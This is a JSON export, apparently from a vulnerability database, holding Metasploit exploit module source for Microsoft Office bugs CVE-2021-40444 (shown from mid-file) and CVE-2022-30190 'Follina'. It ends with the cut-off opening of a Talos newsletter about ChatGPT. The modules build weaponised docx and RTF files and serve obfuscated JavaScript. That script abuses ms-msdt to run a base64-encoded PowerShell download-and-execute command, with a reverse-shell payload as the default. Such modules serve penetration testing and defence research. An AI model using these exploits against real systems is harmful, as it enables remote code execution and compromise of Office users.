File Time (\\xC3\\x5C)\n cab_header << \"\\x20\\x00\" # uint16 {2} - File Attributes\n cab_header << filename # byte {X} - Filename (ASCII)\n cab_header << \"\\x00\" # byte {1} - null Filename Terminator\n\n 
cab_stream = cab_header\n\n # CFDATA\n cab_stream << cab_cfdata\n end\n\n def generate_html\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.cab\"\n inf = \"#{File.basename(@my_resources.first)}.inf\"\n\n file_path = ::File.join(::Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve_2021_40444.js')\n js_content = ::File.binread(file_path)\n\n js_content.gsub!('REPLACE_INF', inf)\n js_content.gsub!('REPLACE_URI', uri)\n if datastore['OBFUSCATE']\n print_status('Obfuscate JavaScript content')\n\n js_content = Rex::Exploitation::JSObfu.new js_content\n js_content = js_content.obfuscate(memory_sensitive: false)\n end\n\n html = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>'\n html += js_content.to_s\n html += '</script></body></html>'\n html\n end\n\n def get_file_in_docx(fname)\n i = @docx.find_index { |item| item[:fname] == fname }\n\n unless i\n fail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\")\n end\n\n @docx.fetch(i)[:data]\n end\n\n def get_template_path\n datastore['DocxTemplate'] || File.join(Msf::Config.data_directory, 'exploits', 'CVE-2021-40444', 'cve-2021-40444.docx')\n end\n\n def inject_docx\n document_xml = get_file_in_docx('word/document.xml')\n unless document_xml\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')\n end\n\n document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')\n unless document_xml_rels\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')\n end\n\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\"\n @docx.each do |entry|\n case entry[:fname]\n when 'word/document.xml'\n entry[:data] = document_xml.to_s.gsub!('TARGET_HERE', 
uri.to_s)\n when 'word/_rels/document.xml.rels'\n entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"mhtml:#{uri}!x-usc:#{uri}\")\n end\n end\n end\n\n def normalize_uri(*strs)\n new_str = strs * '/'\n\n new_str = new_str.gsub!('//', '/') while new_str.index('//')\n\n # makes sure there's a starting slash\n unless new_str[0, 1] == '/'\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def on_request_uri(cli, request)\n header_cab = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST, OPTIONS',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'application/octet-stream',\n 'Content-Disposition' => \"attachment; filename=#{File.basename(@my_resources.first)}.cab\"\n }\n\n header_html = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'text/html; charset=UTF-8'\n }\n\n if request.method.eql? 'HEAD'\n if request.raw_uri.to_s.end_with? '.cab'\n send_response(cli, '', header_cab)\n else\n send_response(cli, '', header_html)\n end\n elsif request.method.eql? 'OPTIONS'\n response = create_response(501, 'Unsupported Method')\n response['Content-Type'] = 'text/html'\n response.body = ''\n\n cli.send_response(response)\n elsif request.raw_uri.to_s.end_with? '.html'\n print_status('Sending HTML Payload')\n\n send_response_html(cli, generate_html, header_html)\n elsif request.raw_uri.to_s.end_with? 
'.cab'\n print_status('Sending CAB Payload')\n\n send_response(cli, create_cab(@dll_payload), header_cab)\n end\n end\n\n def pack_docx\n @docx.each do |entry|\n if entry[:data].is_a?(Nokogiri::XML::Document)\n entry[:data] = entry[:data].to_s\n end\n end\n\n Msf::Util::EXE.to_zip(@docx)\n end\n\n def unpack_docx(template_path)\n document = []\n\n Zip::File.open(template_path) do |entries|\n entries.each do |entry|\n if entry.name.match(/\\.xml|\\.rels$/i)\n content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?\n elsif entry.file?\n content = entry.get_input_stream.read\n end\n\n vprint_status(\"Parsing item from template: #{entry.name}\")\n\n document << { fname: entry.name, data: content }\n end\n end\n\n document\n end\n\n def primer\n print_status('CVE-2021-40444: Generate a malicious docx file')\n\n @proto = (datastore['SSL'] ? 'https' : 'http')\n if datastore['SRVHOST'] == '0.0.0.0'\n datastore['SRVHOST'] = Rex::Socket.source_address\n end\n\n template_path = get_template_path\n unless File.extname(template_path).match(/\\.docx$/i)\n fail_with(Failure::BadConfig, 'Template is not a docx file!')\n end\n\n print_status(\"Using template '#{template_path}'\")\n @docx = unpack_docx(template_path)\n\n print_status('Injecting payload in docx document')\n inject_docx\n\n print_status(\"Finalizing docx '#{datastore['FILENAME']}'\")\n file_create(pack_docx)\n\n @dll_payload = Msf::Util::EXE.to_win64pe_dll(\n framework,\n payload.encoded,\n {\n arch: payload.arch.first,\n mixed_mode: true,\n platform: 'win'\n }\n )\n end\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/word_mshtml_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-11-03T17:41:08", "description": "This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` 
code.\n", "cvss3": {}, "published": "2022-05-30T17:23:18", "type": "metasploit", "title": "Microsoft Office Word MSDTJS", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2022-30190"], "modified": "2022-08-25T21:10:59", "id": "MSF:EXPLOIT-WINDOWS-FILEFORMAT-WORD_MSDTJS_RCE-", "href": "https://www.rapid7.com/db/modules/exploit/windows/fileformat/word_msdtjs_rce/", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FILEFORMAT\n include Msf::Exploit::Powershell\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Post::File\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Microsoft Office Word MSDTJS',\n 'Description' => %q{\n This module generates a malicious Microsoft Word document that when loaded, will leverage the remote template\n feature to fetch an `HTML` document and then use the `ms-msdt` scheme to execute `PowerShell` code.\n },\n 'References' => [\n ['CVE', '2022-30190'],\n ['URL', 'https://www.reddit.com/r/blueteamsec/comments/v06w2o/suspected_microsoft_word_zero_day_in_the_wild/'],\n ['URL', 'https://twitter.com/nao_sec/status/1530196847679401984?t=3Pjrpdog_H6OfMHVLMR5eQ&s=19'],\n ['URL', 'https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/'],\n ['URL', 'https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e'],\n ['URL', 'https://twitter.com/GossiTheDog/status/1531608245009367040'],\n ['URL', 'https://github.com/JMousqueton/PoC-CVE-2022-30190']\n ],\n 'Author' => [\n 'nao sec', # Original disclosure.\n 'mekhalleh (RAMELLA S\u00e9bastien)', # Zeop CyberSecurity\n 'bwatters-r7' # RTF support\n ],\n 'DisclosureDate' => '2022-05-29',\n 'License' => MSF_LICENSE,\n 'Privileged' => false,\n 'Platform' => 'win',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'Payload' => {\n 
'DisableNops' => true\n },\n 'DefaultOptions' => {\n 'DisablePayloadHandler' => false,\n 'FILENAME' => 'msf.docx',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',\n 'SRVHOST' => Rex::Socket.source_address('1.2.3.4')\n },\n 'Targets' => [\n [ 'Microsoft Office Word', {} ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['Follina'],\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [UNRELIABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]\n }\n )\n )\n\n register_options([\n OptPath.new('CUSTOMTEMPLATE', [false, 'A DOCX file that will be used as a template to build the exploit.']),\n OptEnum.new('OUTPUT_FORMAT', [true, 'File format to use [docx, rtf].', 'docx', %w[docx rtf]]),\n OptBool.new('OBFUSCATE', [true, 'Obfuscate JavaScript content.', true])\n ])\n end\n\n def get_file_in_docx(fname)\n i = @docx.find_index { |item| item[:fname] == fname }\n\n unless i\n fail_with(Failure::NotFound, \"This template cannot be used because it is missing: #{fname}\")\n end\n\n @docx.fetch(i)[:data]\n end\n\n def get_template_path\n datastore['CUSTOMTEMPLATE'] || File.join(Msf::Config.data_directory, 'exploits', 'word_msdtjs.docx')\n end\n\n def generate_html\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.ps1\"\n\n dummy = ''\n (1..random_int(61, 100)).each do |_n|\n dummy += '//' + rand_text_alpha(100) + \"\\n\"\n end\n\n cmd = Rex::Text.encode_base64(\"IEX(New-Object Net.WebClient).downloadString('#{uri}')\")\n\n js_content = \"window.location.href = \\\"ms-msdt:/id PCWDiagnostic /skip force /param \\\\\\\"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'#{cmd}'+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe 
IT_AutoTroubleshoot=ts_AUTO\\\\\\\"\\\";\"\n if datastore['OBFUSCATE']\n print_status('Obfuscate JavaScript content')\n\n js_content = Rex::Exploitation::JSObfu.new js_content\n js_content = js_content.obfuscate(memory_sensitive: false)\n end\n\n html = '<!DOCTYPE html><html><head><meta http-equiv=\"Expires\" content=\"-1\"><meta http-equiv=\"X-UA-Compatible\" content=\"IE=11\"></head><body><script>'\n html += \"\\n#{dummy}\\n#{js_content}\\n\"\n html += '</script></body></html>'\n\n html\n end\n\n def inject_docx\n document_xml = get_file_in_docx('word/document.xml')\n unless document_xml\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/document.xml')\n end\n\n document_xml_rels = get_file_in_docx('word/_rels/document.xml.rels')\n unless document_xml_rels\n fail_with(Failure::NotFound, 'This template cannot be used because it is missing: word/_rels/document.xml.rels')\n end\n\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\"\n @docx.each do |entry|\n case entry[:fname]\n when 'word/_rels/document.xml.rels'\n entry[:data] = document_xml_rels.to_s.gsub!('TARGET_HERE', \"#{uri}!\")\n end\n end\n end\n\n def normalize_uri(*strs)\n new_str = strs * '/'\n\n new_str = new_str.gsub!('//', '/') while new_str.index('//')\n\n # makes sure there's a starting slash\n unless new_str.start_with?('/')\n new_str = '/' + new_str\n end\n\n new_str\n end\n\n def on_request_uri(cli, request)\n header_html = {\n 'Access-Control-Allow-Origin' => '*',\n 'Access-Control-Allow-Methods' => 'GET, POST',\n 'Cache-Control' => 'no-store, no-cache, must-revalidate',\n 'Content-Type' => 'text/html; charset=UTF-8'\n }\n\n if request.method.eql? 'HEAD'\n send_response(cli, '', header_html)\n elsif request.method.eql? 
'OPTIONS'\n response = create_response(501, 'Unsupported Method')\n response['Content-Type'] = 'text/html'\n response.body = ''\n\n cli.send_response(response)\n elsif request.raw_uri.to_s.end_with? '.html'\n print_status('Sending HTML Payload')\n\n send_response_html(cli, generate_html, header_html)\n elsif request.raw_uri.to_s.end_with? '.ps1'\n print_status('Sending PowerShell Payload')\n\n send_response(cli, @payload_data, header_html)\n end\n end\n\n def pack_docx\n @docx.each do |entry|\n if entry[:data].is_a?(Nokogiri::XML::Document)\n entry[:data] = entry[:data].to_s\n end\n end\n\n Msf::Util::EXE.to_zip(@docx)\n end\n\n def build_rtf\n print_status('Generating a malicious rtf file')\n\n uri = \"#{@proto}://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{normalize_uri(@my_resources.first.to_s)}.html\"\n uri_space = 76 # this includes the required null character\n uri_max = uri_space - 1\n if uri.length > uri_max\n fail_with(Failure::BadConfig, \"The total URI must be no more than #{uri_max} characters\")\n end\n # we need the hex string of the URI encoded as UTF-8 and UTF-16\n uri.force_encoding('utf-8')\n uri_utf8_hex = uri.each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join\n uri_utf8_hex << '0' * ((uri_space * 2) - uri_utf8_hex.length)\n\n uri_utf16 = uri.encode('utf-16')\n # remove formatting char and convert to hex\n uri_utf16_hex = uri_utf16[1..].each_byte.map { |b| b.to_s(16).rjust(2, '0') }.join\n uri_utf16_hex << '0' * ((uri_space * 4) - uri_utf16_hex.length)\n rtf_file_data = exploit_data('CVE-2022-30190', 'cve_2022_30190_rtf_template.rtf')\n rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_ASCII', uri_utf8_hex)\n rtf_file_data.gsub!('REPLACE_WITH_URI_STRING_UTF16', uri_utf16_hex)\n rtf_file_data.gsub!('REPLACE_WITH_URI_STRING', uri)\n file_create(rtf_file_data)\n end\n\n def build_docx\n print_status('Generating a malicious docx file')\n\n template_path = get_template_path\n unless File.extname(template_path).downcase.end_with?('.docx')\n 
fail_with(Failure::BadConfig, 'Template is not a docx file!')\n end\n\n @docx = unpack_docx(template_path)\n print_status('Injecting payload in docx document')\n inject_docx\n print_status(\"Finalizing docx '#{datastore['FILENAME']}'\")\n file_create(pack_docx)\n end\n\n def primer\n @proto = (datastore['SSL'] ? 'https' : 'http')\n\n if datastore['OUTPUT_FORMAT'] == 'rtf'\n build_rtf\n else\n build_docx\n end\n @payload_data = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, exec_in_place: true)\n super\n end\n\n def random_int(min, max)\n rand(max - min) + min\n end\n\n def unpack_docx(template_path)\n document = []\n\n Zip::File.open(template_path) do |entries|\n entries.each do |entry|\n if entry.name.downcase.end_with?('.xml', '.rels')\n content = Nokogiri::XML(entry.get_input_stream.read) if entry.file?\n elsif entry.file?\n content = entry.get_input_stream.read\n end\n\n vprint_status(\"Parsing item from template: #{entry.name}\")\n\n document << { fname: entry.name, data: content }\n end\n end\n\n document\n end\n\nend\n", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/word_msdtjs_rce.rb", "cvss": {"score": 0.0, "vector": "NONE"}}], "talosblog": [{"lastseen": "2023-03-24T20:18:32", "description": "\n\nWelcome to this week's edition of the Threat Source newsletter.\n\nThere is no shortage of [hyperbolic headlines](<https://www.businessinsider.com/chatgpt-jobs-at-risk-replacement-artificial-intelligence-ai-labor-trends-2023-02?ref=blog.talosintelligence.com>) about ChatGPT out there, everything from how it and other AI tools like it are here to replace all our jobs, make college essays a thing of the past and change the face of cybersecurity as we know it.\n\nIt's the talk of SEO managers everywhere who can't wait to find a way to work "ChatGPT" into a headline. 
And in the security community, everyone is concerned that AI models will help attackers get smarter, faster or more dangerous.\n\nThe biggest issue I'm seeing with that is these tools aren't that smart.\n\nOther writers have done a [far more eloquent](<https://www.theatlantic.com/technology/archive/2022/12/chatgpt-openai-artificial-intelligence-writing-ethics/672386/?ref=blog.talosintelligence.com>) and interesting job than I can in a few dozen words here about [how bad these models are at writing creatively or interpreting human emotion](<https://www.vice.com/en/article/bvmk9m/everybody-please-calm-down-about-chatgpt?ref=blog.talosintelligence.com>), but I wanted to put my own spin on things with my incredibly niche interests and use case for ChatGPT.\n\nFirst, I asked it to help me write this newsletter. While it politely declined to do the whole thing for me because it can't produce something on Talos' behalf, it did start to compile a list of "the top stories we're following this week."\n\n![Threat Source newsletter \\(March 9, 2023\\) \u2014 Stop freaking out about ChatGPT](